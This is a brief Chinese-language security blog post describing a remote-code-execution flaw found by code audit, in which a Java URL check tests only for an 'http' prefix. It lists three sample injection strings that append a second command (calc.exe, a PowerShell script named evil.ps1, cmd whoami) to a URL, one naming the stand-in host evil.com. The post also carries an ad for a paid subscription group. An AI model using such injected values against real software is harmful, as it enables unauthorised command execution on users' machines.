白盒审计出的一个RCE
原创 h1 2026-07-02 12:00 江苏

正文出问题的代码:if (url == null || !
正文
出问题的代码:
if (url == null || !url.startsWith("http"))
{
logger.warn("Not a valid URL to open:" + url);
return;
}URL 校验这里有问题:
!url.startsWith("http")攻击者可以传入类似如下代码:
http://evil.com & calc.exe
http://example.com && powershell evil.ps1
http://x" && cmd /c whoami如果你是一个长期主义者,欢迎加入我的知识星球,本星球日日更新,包含号主大量一线实战,全网独一无二,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾
如何利用ai辅助挖漏洞
如何在移动端抓包-下
如何绕过签名校验
参考
https://github.com/jitsi/jitsi/commit/8aa7be58522f4264078d54752aae5483bfd854b2